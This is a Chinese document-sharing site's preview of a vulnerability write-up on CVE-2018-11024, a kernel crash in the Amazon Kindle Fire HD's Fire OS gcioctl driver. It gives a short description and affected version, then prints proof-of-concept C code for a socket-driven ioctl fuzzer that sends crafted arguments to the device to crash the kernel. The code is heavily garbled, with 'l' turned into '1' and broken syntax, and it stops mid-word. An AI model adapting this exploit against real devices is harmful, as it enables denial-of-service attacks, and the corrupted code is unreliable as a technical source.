收藏
下载资源 加入VIP,免费下载

(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:lao****ou 文档编号:794796 上传时间:2024-05-25 格式:DOCX 页数:15 大小:51.94KB
下载 相关 举报
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共15页
亲,该文档总共15页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(15页珍藏版)》请在第一文库网上搜索。

1、(CVE-2018-11024)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3的内核组件中的内核模块omapdriversmiscgcxgcioct1gcif.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/gcioct1使用命令1077435789并导致内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc#inc1ude#inc1ude/str1en#inc1ude#inc1ude/inet_addr#inc1ude/write#inc1ude#i

2、nc1ude#inc1ude#inc1ude#inc1ude/Socketboi1erp1atecodetakenfromhere:http:/seed,ioct1-idjnum-mappingsjnum-b1obsdev-name-1enjdev-namemap_entry_t_arr,b1obs*/intdebug=1;typedefstructintsrc_id;intdst_id;intoffset;map_entry_t;shorttiny_va1s18=128,127,64,63,32,31,16,15,8,7t%3,2,1,0,256,255,-1;int*sma11_va1s;

3、intnum_sma11_va1s;/popu1atessma11_va1swhenca11edvoidpopu1ate_arrs(inttop)intnum=1;intcount=0;whi1e(numtop)/printf(,%dnnum);num=1;sma11_va1s=ma11oc(sizeof(int)*count);memset(sma11_va1s,0,count);inti=0;whi1e(num1)sma11_va1si=num;i+;sma11-va1si=num-1;i+;num=1;sma11_va1si=0;sma11_va1si+1=top;sma11_va1si

4、+2=top-1;sma11_va1si+3=-1;)/generatearandomva1ueofsizesizeandstoreitine1em./va1uehasaweight%chancetobeasma11va1uevoidgen_rand_va1(intsize,char*e1emjintsma11_weight)inti;if(rand()%100)sma11_weight)/dosma11thingunsignedintidx=(rand()%num_sma11_va1s);printf(Choosing%dn,sma11-va1sidx);switch(size)case2:

5、idx=(rand()%18);(short*)e1em=tiny_va1sidx;break;case4:*(int*)e1em=sma11_va1sidx;break;case8:*(1ong1ong*)e1em=sma11_va1sidx;break;defau1t:printf(Damnbro.Size:%dn,jsize);exit(-1);e1sefor(i=0;isize;i+)e1emi=(char)(rand()%0x100);intmain(intargcichar*argv)intnum_b1obs=0,num_mappings=ji=0,dev_name_1en=0,j

6、;unsignedintioct1_id=0;char*dev_name;void*tmp;char*ptr_arr;int*1en_arr;unsignedintseed;intsockfd,c1ient_sockic,read_size;structsockaddr_inserver,c1ient;intmsg_size;void*generic_arr264;/maxva1forsma11_va1sarrayinttop=8192;intent=0;/chancethatourgenericsarefi11edwithsma11va1s,intdefau1t_weight=50;popu

7、1ate_arrs(top);intretest=1;gotorerun;sockfd=socket(AF_INET,SOCK_STREAM,0);if(sockfd=-1)(printf(nCou1dnotcreatesocket);puts(,Socketcreated);setsockopt(sockfd,SO1_SOCKET,SO_REUSEADDR,&(int)1,sizeof(int);server.sin_fami1y=AF_INET;server.sin_addr.s_addr=INADDR_ANY;server.sin_port=htons(atoi(argv1);/Bind

8、if(bind(sockfdj(structsockaddr*)&server,sizeof(server)0)/printtheerrormessageperror(bindfai1ed.Error*1);return1;puts(,binddone);1isten:/1isten1isten(sockfd,3);puts(Waitingforincomingconnections.);c=sizeof(structsockaddr_in);/acceptconnectionfromanincomingc1ientc1ient_sock=accept(sockfd,(structsockad

9、dr*)&c1ient,(sock1en_t*)&c);if(c1ient_sock0)(recvtheentiremessagechar*recv_buf=ca11oc(msg_size,sizeof(char);if(recv_buf=NU11)printf(Fai1edtoa11ocaterecv_bufn);exit(-1);intnrecvd=recv(c1ient_sock,recv_bufjmsg_size,0);if(nrecvd!=msg_size)printf(Errorgettinga11data!n);printf(,nrecvd:%dnmsg_size:%dn,nre

10、cvd,msg_size);eit(-1);/quick1ysaveacopyofthemostrecentdataintsavefd=open(sdcardsaved,O_WRON1YO_TRUNCO_CREAT,0644);if(savefd0)perror(opensaved);exit(-1);interr=Write(SaVefd,recv_bufjmsg_size);if(err!=msg_size)perror(writesaved);exit(-1);fsync(savefd);c1ose(savefd);rerun:if(retest)recv_buf=ca11oc(msg_

11、sizejsizeof(char);intfd=open(,sdcardsavedjO_RDON1Y);if(fd0)perror(open:);exit(-1);intfsize=1seek(fd,0,SEEK_END);printf(fi1esize:%dn,fsize);1seek(fdj0,SEEK_SET);read(fdjrecv_buffsize);)char*head=recv_buf;seed=0;/seed,ioct1-idjnum_mappings,num-b1obsjdev_name_1en,dev_name,map_entry_t_arrib1ob-1en-arrjb

12、1obsmemcpy(8tseedjhead,4);head+=4;memcpy(Sioct1-idjhead,4);head+=4;memcpy(&num_mappings,head,4);head+=4;memcpy(Snum-b1obsjhead,4);head+=4;memcpy(&dev_name_1en,head,4);head+=4;/srandwithnewseedsrand(seed);*devname*/dev_name=ca11oc(dev-name-1en+1jsizeof(char);if(dev_name=NU11)printf(Fai1edtoa11ocatede

13、v_namen);exit(-1);)memcpy(dev_name,head,dev_name_1en);head+=dev_name_1en;*map*/map_entry_t*map=ca11oc(num-mappingsjsizeof(map_entry_t);if(map=NU11)printf(Fai1edtoa11ocatemapn);exit(-1);if(num_mappings!=0)memcpy(map,head,num_mappings*sizeof(map_entry_t);head+=num_mappings*sizeof(map_entry_t);)*b1obs*/firstcreateanarraytostorethesizesthemse1ves1en_arr=ca11oc(num-b1obsjsizeof(int);if(1en_arr=NU11)printf(Fai1edtoa11ocat

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服